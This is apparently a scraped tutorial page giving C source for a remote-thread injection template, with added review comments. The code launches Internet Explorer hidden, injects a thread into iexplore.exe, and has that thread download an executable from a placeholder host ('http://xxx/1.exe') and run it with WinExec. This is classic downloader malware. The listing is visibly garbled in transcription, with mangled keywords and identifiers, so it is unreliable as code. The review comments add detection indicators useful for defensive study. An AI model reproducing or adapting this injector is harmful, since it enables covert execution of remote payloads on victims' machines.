Remote thread template (write the Execution Code to the target process)

Source: Internet
Author: User

This method writes ThreadProc, the function that the thread created by CreateRemoteThread will run, directly into the target process. The sequence is the typical one: elevate privilege -> open the process -> allocate space in the target process -> write the thread code -> CreateRemoteThread.

# Include <tlhelp32.h>
# Include <stdio. h>
# Include <urlmon. h>
# Pragma comment (lib, "urlmon. lib ")
# Include <shellapi. h>

// NOTE(review): this listing is a transcription (capitalised keywords, spaced
// tokens such as "lpPara-> Url"); it does not compile as shown. The comments
// below describe the flow as written.
//
// Parameter block that Inject() copies into the target process and hands to the
// remote thread as its single argument. Everything the remote code needs is
// resolved in the injecting process first, so the block carries both the data
// (URL, drop path) and the two function addresses the thread calls through.
// Detection note: a ~520-byte block holding a URL plus a path ending in ".exe",
// written into a foreign process right before CreateRemoteThread, is a strong
// static and behavioural indicator of this download-and-execute pattern.
Typedef struct _ RemotePara
{
// URL the remote thread downloads from (filled by Inject, fixed-size buffer).
Char Url [255];
// Local path the download is saved to and then executed from.
Char FilePath [255];
// Address of URLDownloadToFileA, resolved via GetProcAddress in Inject()
// (the original comment says "URL"; the field holds a function address).
DWORD DownAddr;
// Address of WinExec, resolved via GetProcAddress in Inject().
DWORD ExecAddr;
} RemotePara;

// Thread body that runs inside the target process. Its machine code is copied
// there byte-for-byte by Inject(), so it cannot reference anything from this
// module directly and instead calls the two APIs through the addresses stored
// in *lpPara. Sequence: download lpPara->Url to lpPara->FilePath, then run
// that file with uCmdShow = 1. The download's HRESULT is discarded, so WinExec
// is attempted even if the download failed.
// Detection note: a thread in the target (here a browser process) whose start
// address lies outside any loaded module and which calls URLDownloadToFileA
// followed by WinExec on the same path is the classic downloader footprint.
DWORD _ stdcall ThreadProc (RemotePara * lpPara)
{
// NOTE(review): the first parameter of this typedef ("maid") is garbled in the
// transcription; the page does not show the original declaration.
Typedef UINT (_ stdcall * MWinExec) (maid, UINT uCmdShow );
Typedef HRESULT (_ stdcall * MURLDownloadToFile) (LPUNKNOWN pCaller,
LPCTSTR szURL, LPCTSTR szFileName,
DWORD dwReserved, LPBINDSTATUSCALLBACK lpfnCB );
MURLDownloadToFile myURLDownloadToFile;
// Read the pre-resolved address of URLDownloadToFileA from the parameter block.
MyURLDownloadToFile = (MURLDownloadToFile) lpPara-> DownAddr;
// Download Url to FilePath; the return value is not checked.
MyURLDownloadToFile (0, lpPara-> Url, lpPara-> FilePath, 0, 0 );
MWinExec myWinExec;
// Read the pre-resolved address of WinExec from the parameter block.
MyWinExec = (MWinExec) lpPara-> ExecAddr;
// Run the downloaded file (uCmdShow = 1) regardless of the download outcome.
MyWinExec (lpPara-> FilePath, 1 );
Return 0;
}

// Returns the PID of the first process whose image name matches ProcessName
// (case-insensitively, via strupr on both sides), or 0 if none is found or the
// snapshot cannot be taken. Walks a Toolhelp process snapshot.
// Caveats as written: strupr converts its argument in place, so the caller's
// ProcessName buffer is uppercased as a side effect and must be writable; the
// early return on a match skips CloseHandle, leaking the snapshot handle.
// NOTE(review): "createconlhelp32snapshot" and the single "=" in the two
// comparisons below are transcription artefacts; read them as the Toolhelp
// snapshot call and as equality tests.
DWORD GetProcessID (char * ProcessName)
{
PROCESSENTRY32 pe32;
// dwSize must be set before Process32First, or the call fails.
Pe32.dwSize = sizeof (pe32 );
HANDLE hProcessSnap = createconlhelp32snapshot (TH32CS_SNAPPROCESS, 0 );
If (hProcessSnap = INVALID_HANDLE_VALUE)
{
Printf ("createconlhelp32snapshot error ");
Return 0;
}
BOOL bProcess = Process32First (hProcessSnap, & pe32 );
While (bProcess)
{
// Case-insensitive match; both strings are uppercased in place.
If (strcmp (strupr (pe32.szExeFile), strupr (ProcessName) = 0)
// Returns without closing hProcessSnap.
Return pe32.th32ProcessID;
BProcess = Process32Next (hProcessSnap, & pe32 );
}
CloseHandle (hProcessSnap );
Return 0;
}

// Enables the named privilege (the caller passes SE_DEBUG_NAME) on the current
// process token. Returns 0 on success, 1 if the token cannot be opened or
// AdjustTokenPrivileges fails.
// Caveats as written: a LookupPrivilegeValue failure is only printed, after
// which the uninitialised luid is still written into tp; hToken is never
// closed on any path.
// Detection note: a non-debugger process enabling SeDebugPrivilege is a common
// precursor to cross-process memory writes; token-privilege adjustment auditing
// and EDR "privilege enabled" telemetry surface this step before injection.
Int EnableDebugPriv (const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
// Not initialised; only set if LookupPrivilegeValue succeeds.
LUID luid;
If (! OpenProcessToken (GetCurrentProcess (),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
& HToken ))
{
Printf ("OpenProcessToken error \ n ");
Return 1;
}
If (! LookupPrivilegeValue (NULL, name, & luid ))
{
// Failure is reported but not returned; execution continues with luid unset.
Printf ("LookupPrivilege error! \ N ");
}
Tp. PrivilegeCount = 1;
Tp. Privileges [0]. Attributes = SE_PRIVILEGE_ENABLED;
Tp. Privileges [0]. Luid = luid;
If (! AdjustTokenPrivileges (hToken, 0, & tp, sizeof (TOKEN_PRIVILEGES), NULL, NULL ))
{
Printf ("AdjustTokenPrivileges error! \ N ");
Return 1;
}
// hToken is leaked here and on the error path above.
Return 0;
}

// Injects ThreadProc and its RemotePara argument into process dwRemoteProcessId
// and starts it as a remote thread. Returns FALSE on the first failing step.
// Steps as written: enable SeDebugPrivilege -> OpenProcess(PROCESS_ALL_ACCESS)
// -> VirtualAllocEx 4 KiB RWX -> copy 1024 bytes from &ThreadProc -> fill a
// RemotePara with a hard-coded URL/drop path and the resolved addresses of
// URLDownloadToFileA and WinExec -> VirtualAllocEx RWX for the parameter block
// -> WriteProcessMemory -> CreateRemoteThread.
// Caveats as written: the process handle (named hWnd) and hThread are never
// closed; the remote allocations are never freed on the error paths; the
// parameter block is data but is allocated PAGE_EXECUTE_READWRITE; the 1024-byte
// copy is a fixed size unrelated to ThreadProc's actual length.
// Detection note: OpenProcess with PROCESS_ALL_ACCESS followed by an RWX
// VirtualAllocEx, WriteProcessMemory and CreateRemoteThread into the same target
// is the textbook remote-thread injection chain; the hard-coded URL and
// "c:\a.exe" drop path are the obvious static indicators in the binary.
BOOL Inject (const DWORD dwRemoteProcessId)
{
If (EnableDebugPriv (SE_DEBUG_NAME ))
{
Printf ("add privilege error ");
Return FALSE;
}
// Despite the name, hWnd is a process handle; it is never closed.
HANDLE hWnd = OpenProcess (PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId );
If (! HWnd)
{
Printf ("OpenProcess failed ");
Return FALSE;
}
// 4 KiB of RWX memory in the target for the thread's code.
Void * pRemoteThread = VirtualAllocEx (hWnd, 0,
1024*4, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE );
If (! PRemoteThread)
{
Printf ("VirtualAllocEx failed ");

Return FALSE;
}
// Copies a fixed 1024 bytes starting at ThreadProc's address. NOTE(review):
// this call passes four arguments; the second WriteProcessMemory below passes
// five (the lpNumberOfBytesWritten argument) — as transcribed they differ.
If (! WriteProcessMemory (hWnd, pRemoteThread, & ThreadProc, 1024 ))
{
Printf ("WriteProcessMemory failed ");
Return FALSE;
}
// Build the parameter block locally before copying it over.
RemotePara myRemotePara;
ZeroMemory (& myRemotePara, sizeof (RemotePara ));
// Resolve the two API addresses in this process; the same DLLs are assumed to
// be mapped at the same addresses in the target. Neither handle is checked.
HINSTANCE hurlmon = LoadLibrary ("urlmon. dll ");
HINSTANCE kernel = LoadLibrary ("kernel32.dll ");
MyRemotePara. DownAddr = (DWORD) GetProcAddress (hurlmon, "URLDownloadToFileA ");
MyRemotePara. ExecAddr = (DWORD) GetProcAddress (kernel, "WinExec ");
// Hard-coded download URL and drop path (placeholder host "xxx" in the listing).
Char urlfile [255];
Strcpy (urlfile, "http: // xxx/1.exe ");
Strcpy (myRemotePara. Url, urlfile );
Strcpy (myRemotePara. FilePath, "c: \ a.exe ");
// Second remote allocation, for the parameter block; RWX although it holds
// only data.
RemotePara * pRemotePara = (RemotePara *) VirtualAllocEx (hWnd, 0, sizeof (RemotePara), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
If (! PRemotePara)
{
Printf ("VirtualAllocEx failed ");

Return FALSE;
}
// Copy the filled-in RemotePara into the target.
If (! WriteProcessMemory (hWnd, pRemotePara, & myRemotePara, sizeof (myRemotePara), 0 ))
{
Printf ("WriteProcessMemory failed ");
Return FALSE;
}
// Start ThreadProc in the target with pRemotePara as its argument. The thread
// handle is never closed or waited on.
HANDLE hThread = CreateRemoteThread (hWnd, 0, 0, (LPTHREAD_START_ROUTINE) pRemoteThread, pRemotePara, 0, 0 );
If (! HThread)
{
Printf ("CreateRemoteThread failed ");

Return FALSE;
}
// NOTE(review): lowercase "true" in a BOOL function, as transcribed.
Return true;
}

// Entry point. Builds "<system drive>:\Program Files\Internet Explorer\..." from
// the system directory, launches that executable hidden, waits one second,
// looks up the PID of "iexplore.exe" and injects into it.
// Caveats as written: the GetSystemDirectory return value is not checked before
// Path[3] is overwritten, so an empty/short result still gets truncated; the
// Sleep is a fixed 1 s race with process start-up; a 0 PID from GetProcessID
// (not found) is passed to Inject unchecked, where OpenProcess then fails.
// NOTE(review): the file name "ipolice.exe" and the spaced backslashes are as
// transcribed; the page does not show the original string.
// Detection note: a hidden browser launch (SW_HIDE) followed within a second by
// a remote thread in that browser from an unrelated parent is the behavioural
// chain process-creation and thread-injection telemetry would show.
Int APIENTRY WinMain (HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
Int nCmdShow)
{
Char Path [255];
GetSystemDirectory (Path, sizeof (Path ));
// Keep only "X:\" (three characters) and drop the rest of the system path.
Path [3] = 0x00;
Strcat (Path, "Program Files \ Internet Explorer \ ipolice.exe ");
// Launch the browser with no visible window.
WinExec (Path, SW_HIDE );
// Fixed delay to let the process appear in the snapshot.
Sleep (1000 );
DWORD Pid = GetProcessID ("iexplore.exe ");
// Inject's result is ignored.
Inject (Pid );
Return 0;
}
